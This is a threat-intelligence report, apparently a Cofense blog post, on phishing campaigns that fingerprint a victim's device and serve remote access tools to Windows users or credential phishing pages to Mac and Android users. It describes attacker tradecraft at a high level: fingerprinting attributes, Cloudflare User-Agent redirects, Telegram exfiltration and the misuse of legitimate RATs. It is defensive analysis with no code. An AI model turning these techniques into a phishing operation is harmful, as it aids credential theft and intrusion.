By: Max Gannon, Cofense Intelligence
Cofense Intelligence is observing a clear shift in phishing operations: threat actors are moving beyond broad, one-size-fits-all campaigns and adopting platform-aware delivery that adapts to the victim’s device, browser, and environment. What began as simple Windows-focused malware distribution campaigns has evolved into more sophisticated campaigns that can selectively deliver credential phishing, remote access tools, or malware across Windows, MacOS, and Android. This trend reflects a broader strategic change in the threat landscape, one that is designed to increase the likelihood of compromise, expand target coverage, and improve threat actor return on investment.
Traditional Phishing Campaigns
Traditional phishing campaigns delivered malware using simple emails, often with inconsistent narratives (Figure 1) or with basic infection chains (Figure 2). These campaigns used attached archives containing malicious scripts that bypassed secure email gateways (SEGs). These campaigns were simplistic but still effective. Due to general improvements in SEGs and email-based security defenses, as well as an increased incorporation of well-trained AI into said defenses, traditional phishing campaigns using malicious attachments appear in inboxes significantly less often than in the past.
Figure 1: An email from a traditional phishing campaign with an attached archive containing a script that runs malware. This corresponds to Active Threat Report (ATR) 389255.

Figure 2: A very simplistic infection chain leading to the execution of Ave_Maria Stealer.
These simplistic, traditional, phishing campaigns are detailed in an exhaustive number of Active Threat Reports published by Cofense Intelligence over the years. Active Threat Reports contain all the elements of a phishing campaign, from individual file hashes and network indicators of compromise (IOCs) to all involved subjects and general themes of the email, providing context-rich reports on full campaigns.
Modern Phishing Campaigns
Modern phishing campaigns use emails with targeted themes and narratives relevant to the recipient that provide believable reasons to click embedded links (Figure 3) with complex, multi-stage infection chains (Figure 4).
Figure 3: An email from a modern phishing campaign targeting a victim belonging to a veterinarian company that contains an embedded URL leading to a phishing site that detects the operating system of the victim. This corresponds to ATR 411478.

Figure 4: A more complex infection chain staring with the email in Figure 3 involving two steps of fingerprinting that leads to either credential phishing or Ninite Loader. Ninite Loader then delivers ConnectWise RAT depending on the local environment.
Multi-Platform Delivery
Threat actors delivering modern campaigns are using browser and operating system information to deliver increasingly targeted content. This information is collected from the “User-Agent” provided by the browser when victims visit a landing page via a URL embedded in an email or attachment. Additional information, such as the victim’s email address, may sometimes be included in the embedded URL. The threat actors use multiple different methods to fingerprint and uniquely identify victim computers before delivering targeted content. Sometimes this fingerprinting is only used to tailor the delivered content, but threat actors are progressively using tools like Telegram to exfiltrate and save the information more often.
Platform Determination Methods
Although threat actors can use many different methods to determine the operating system and browser of the user, from Cloudflare tools to a multitude of open-source fingerprinting projects, the most common method is a script built into the kit used by the threat actor. There are a large number of different multi-platform kits used, but the majority of them use the same, or very similar, methods.
The most commonly detected and logged components are:
- Browser type
- Operating system/device type
- Language
- Victim local time and local time zone
- Screen and window size
- Geolocation
Some of the basic information collected is shown in Figure 5.

Figure 5: Basic information collected by one of the many open-source multi-platform kits, excessive documentation ensures even minimally skilled threat actors can take advantage of these tools.
One method of detection that is appearing more often is the use of Cloudflare User-Agent blocking which redirects traffic based on the perceived operating system of the browser before the victim even visits the malicious page. This enables threat actors to deliver customized payloads without having to add their own detection scripts.
Malware Delivery Kits
There are a host of multi-platform kits used by threat actors to deliver malware and credential phishing. Some of the kits that are the most convincing and have had the most effort put into them can be seen in Figures 6 and 7. The most commonly spoofed brands by these campaigns are:
- Docusign
- Microsoft Teams
- Adobe
- Zoom
Figure 7: The landing page seen in ATR 41211 which delivers Itarian RAT to Windows based browsers and is designed to deliver relevant payloads for other operating systems. Itarian RAT then further fingerprints the victim’s machine and potentially delivers ConnectWise RAT.
The majority of the “malware” delivered in these multi-platform campaigns are, in fact, technically legitimate remote access tools (RATs) that have been repurposed to act as remote access trojans (Also RATs). Threat actors are increasingly favoring these technically legitimate RATs because they are much harder for automated defenses to detect, and some IT teams even use the same RATs as threat actors, making distinguishing legitimate traffic from malicious traffic almost impossible.
Credential Phishing Kits
The credential phishing pages that the multi-platform campaigns redirect to are often simpler than the malware delivery pages and use a similar layout to each other, albeit with different logos. This is notable as many modern credential phishing campaigns simply ask for any email address and password without regard to the service. Two of the most commonly seen credential phishing pages can be seen in Figures 8 and 9.
Figure 8: The landing page for ATR 413611 which delivered ConnectWise RAT for Windows based operating systems and the shown credential phishing page for MacOS or Android.
Figure 9: The landing page for ATR 411787 which delivered Itarian RAT for Windows based operating systems and the shown credential phishing page for MacOS or Android.
Motivation of Multi-Platform Targeting
Threat actors are adopting multi-platform targeting for a simple reason: it improves the economics of phishing. By building campaigns that can identify a victim’s device and deliver the most effective payload for that environment, threat actors can reach more targets, increase the likelihood of compromise, and extract more useful information from each interaction. Instead of losing traffic when a victim is on MacOS, Android, or another unsupported platform, threat actors can still monetize the click-through credential theft or customized remote access tools. In practice, this means greater profit, broader target coverage, and higher return on investment from the same lure, infrastructure, and campaign effort.
Threat Actor Economics: Maximizing ROI
Multi-platform targeting does more than expand reach; it allows threat actors to extract more value from each campaign. A single lure, landing page, and delivery workflow can be reused across multiple operating systems, reducing infrastructure costs while minimizing wasted clicks from users on unsupported devices. This increases yield from the same social engineering effort, effectively giving threat actors the equivalent of multiple campaigns for the cost of one. When successful access is later monetized through Initial Access Broker (IAB) activity, the result is a longer profit window and substantially stronger return on investment. Groups acting as IABs will typically access victim computers through either stolen credentials or delivered malware, establish persistence, perform reconnaissance on the infected machine and broader network, and sell access to the highest bidder. This is one of the more common ways for enterprises to fall victim to ransomware.
Implications of Multi-Platform Targeting
The shift to multi-platform targeting has two related but distinct consequences for defenders. On the strategic side, long-standing assumptions about which devices are inherently safer can no longer be relied on. On the operational side, the security architectures most organizations have built around those assumptions are poorly suited to detect campaigns that span multiple operating systems. Both gaps stem from the same evolution in threat actor behavior, and together they mean the attack surface is growing while the ability to recognize and correlate intrusions across it is shrinking.
The End of Platform Safety Assumptions
Multi-platform delivery of malware and credential phishing is eroding long-held assumptions that certain operating systems or device types are safer by default. As threat actors build campaigns that can adapt to Windows, MacOS, Android, and other environments, endpoint diversity no longer reduces exposure; it increases it. Previously, statements like “we don’t use Windows” or “mobile users are lower risk” were common if not respected, but that is no longer a meaningful defense when every device can be fingerprinted, targeted, and monetized differently. This is especially important for devices that sit outside standard enterprise protections, where weaker visibility and inconsistent controls can make them attractive paths for compromise.
Why Platform‑Centric Security Is Failing
Many enterprises don’t just have tools poorly suited to monitoring multiple operating systems; they may not even have tools for monitoring operating systems that are not widely used across the enterprise. Even when monitoring exists for multiple operating systems, security tooling is generally built around individual operating systems, not the campaigns that move across them. When a threat actor deploys a single phishing kit that delivers three completely different threats all on the same page with the same infrastructure, defenders typically do not see it as one campaign. A Windows-focused endpoint tool may flag the RAT on one machine while the MacOS event goes unlogged, and the mobile credential theft is never attributed, as it is not even on company infrastructure. The threat actor is running one operation. The defenders are looking at three unrelated problems.
This fragmentation creates gaps that are easy to exploit. Security teams using platform-siloed toolsets have difficulty correlating activity across operating environments, so the same threat actor infrastructure can be behind incidents on multiple device types without anyone connecting them. When behavior baselines and alerting thresholds are set independently per OS, a campaign spread across Windows, MacOS, and mobile may not cross the alert threshold on any single platform, even though the overall impact is significant. Attributing activity to a specific user is also harder when monitoring pipelines for different platforms do not share session or identity data. The end result is that platform-centric security consistently underreports the actual scope of these campaigns, leaving organizations with an incomplete picture of what is already in their environment.
Summary
Threat actors used to send the same malicious email to everyone and hope that one of the hundreds of recipients clicked the embedded link. That approach is fading. Cofense Intelligence is now observing campaigns where threat actors first identify what kind of device the target is using (Windows, MacOS, iPhone, Android, etc.) and then deliver an attack tailored specifically to that device, all from the same email. A Windows employee might receive a RAT that gives a threat actor remote control of their machine, while a colleague who opens the same link on a Mac or phone gets a convincing fake login page instead. The threat actor profits either way.
This matters to organizations because the tools most enterprises rely on were not built for this model. Endpoint security on a Windows machine does not see what happened on a Mac. The mobile device management platform does not talk to the network monitoring tool. When a threat actor runs one campaign across three device types, defenders often see three unrelated, low-priority alerts instead of one coordinated intrusion. The attack looks small. It is not.
A further complication is that the tools threat actors use to gain access are often the same tools legitimate IT departments use every day. Remote access software like ConnectWise is a recognized, trusted application. When a threat actor installs it on a victim’s machine through a phishing campaign, automated defenses frequently allow it to run unchallenged. By the time the intrusion is recognized, the threat actor may have already sold access to that machine or installed additional malware. Access sales of this kind are one of the most common paths to ransomware. The three primary findings from this analysis are:
- Platform‑aware attacks are now standard.
- Legitimate tools are high‑risk blind spots.
- Detection requires context, not just signatures.
For leadership, the core message is this: the assumption that some employees are safe because they use a Mac, a phone, or a non-Windows device is no longer valid. Every device in the enterprise is a potential entry point, and every click on a phishing link gives a threat actor something to work with regardless of platform. Addressing this requires visibility that crosses device boundaries and intelligence that ties context activity across operating systems into a single campaign view, rather than treating each platform as its own separate problem.
Mitigation
Defending against multi-platform phishing campaigns means looking past the inbox. Because these campaigns deliver different payloads depending on the victim’s device, blocking the initial email is only part of the picture. Organizations need to understand what happens after an employee clicks: what redirect chains are in use, and what platform-specific delivery logic is embedded in the kit. Making the decision point visible, the point where a Windows victim gets ConnectWise RAT and a MacOS victim gets a credential phishing page, is what makes attribution possible. Mapping threat actor infrastructure across campaigns also helps identify targeting patterns before they reach users, rather than piecing together what happened after a compromise.
Automated detection has a specific blind spot against campaigns that repurpose legitimate remote access tools. A signature-based system will not flag ConnectWise RAT or similar tools as malicious because, depending on usage, they are not malicious. What catches them is context: a trained employee who knows that a given organization’s IT department does not use ConnectWise RAT will recognize its unexpected presence, where an automated tool will simply let it pass. Finding and maintaining that kind of human-vetted, contextual intelligence is essential for defending against this threat class.